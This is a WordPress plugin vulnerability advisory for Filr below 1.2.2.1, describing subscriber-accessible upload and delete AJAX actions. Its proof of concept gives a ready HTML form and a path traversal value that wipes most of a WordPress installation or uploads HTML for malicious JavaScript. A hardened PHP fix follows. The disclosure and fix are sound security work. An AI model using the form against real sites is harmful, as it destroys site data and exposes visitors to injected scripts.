WordPress Plugin Vulnerabilities

Filr - Secure Document Library < 1.2.2.1 - Subscriber+ AJAX Calls

Description

The plugin does not have an authorisation check in two of its AJAX actions, allowing them to be called by any authenticated user, such as a subscriber. They are protected with a nonce; however, the nonce is leaked on the dashboard. This could allow such users to upload arbitrary HTML files as well as delete all files or arbitrary ones.

Proof of Concept

Affected AJAX actions: upload_file and delete_file. To get the nonce, search for uploader_nonce in the dashboard.

The following actions can be triggered by any authenticated user. All listed actions were triggered with a subscriber account.

1. Restricted file upload.

It is possible to upload files whose name is not htaccess and whose extension is not a valid PHP extension. This means it is possible to upload HTML files. Those HTML files can be used to execute malicious JavaScript.

2. Data deletion over upload process

The upload function contains a bug that allows deleting every file (excluding directories and files with a leading dot) that can be deleted by the executing user (in my case www-data). This bug can be used to delete nearly a whole WordPress installation (a blank directory structure will remain).

3. Direct files deletion

The delete_file function can be used to obtain results identical to those described in 2.

You can use the following HTML form:

<form action="<your host here>/wp-admin/admin-ajax.php" method="post" enctype="multipart/form-data">
<input type="text" name="action" value="" placeholder="upload_file or delete_file">
<input type="text" name="nonce" value="" placeholder="your nonce here">

<!--
Use post_id values to create a directory. Don't use it for path traversal if you want to successfully upload a file. To wipe nearly the entire installation use e.g. ../../../../../../../../../../
The uploaded file will be stored inside the directory specified in post_id.
-->
<input type="text" name="post_id" value="" placeholder="">

<!--
Your html file.
-->
<input type="file" name="file-upload" value="upload">

<!-- the following element is used for the delete_file function call. -->
<!-- before unlink is called a file_exists check is performed. -->
<input type="text" name="filename" placeholder="valid target file" >

<input type="submit" value="submit" >

</form>
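For comparison, below is a hardened version of the two handlers written from the advisory's description (an added example, not the plugin's own code). The nonce action name filr_uploader, the filr upload subdirectory and the allowed document types are assumed.

```php
<?php
// Added example, not the plugin's code: hardened upload_file / delete_file handlers.
// Assumed names: nonce action 'filr_uploader', upload subdirectory 'filr'.
require_once ABSPATH . 'wp-admin/includes/file.php';

add_action( 'wp_ajax_upload_file', 'example_filr_secure_upload' );
add_action( 'wp_ajax_delete_file', 'example_filr_secure_delete' );

// Resolve a user-supplied name and refuse anything that escapes the plugin's base directory.
function example_filr_resolve_inside_base( $base, $relative ) {
    $base   = realpath( $base );
    $target = realpath( $base . '/' . $relative );
    if ( false === $base || false === $target ) {
        return false;
    }
    return 0 === strpos( $target, $base . DIRECTORY_SEPARATOR ) ? $target : false;
}

function example_filr_secure_upload() {
    // Authorisation: the advisory's root cause was that any logged-in user could reach this.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // CSRF: the nonce is still verified, but it is no longer the only gate.
    check_ajax_referer( 'filr_uploader', 'nonce' );
    // post_id is an integer tied to a post the user may edit, never a path fragment.
    $post_id = absint( $_POST['post_id'] ?? 0 );
    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'bad post', 400 );
    }
    // Fixed allow-list of document types; .html is deliberately not on it.
    $allowed = array( 'pdf' => 'application/pdf', 'txt' => 'text/plain' );
    $result  = wp_handle_upload( $_FILES['file-upload'], array( 'test_form' => false, 'mimes' => $allowed ) );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 400 );
    }
    wp_send_json_success( $result['url'] );
}

function example_filr_secure_delete() {
    if ( ! current_user_can( 'delete_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'filr_uploader', 'nonce' );
    $base = wp_upload_dir()['basedir'] . '/filr';
    // basename() strips directory components, so "../../wp-config.php" becomes "wp-config.php",
    // and the realpath check confines the result to $base.
    $name   = basename( sanitize_file_name( wp_unslash( $_POST['filename'] ?? '' ) ) );
    $target = example_filr_resolve_inside_base( $base, $name );
    if ( false === $target || ! is_file( $target ) || ! unlink( $target ) ) {
        wp_send_json_error( 'not deleted', 400 );
    }
    wp_send_json_success();
}
```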

Affects Plugins

Fixed in 1.2.2.1

Classification

Type
NO AUTHORISATION

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes

Timeline

Publicly Published
2022-05-23
Added
2022-05-23
Last Updated
2023-02-19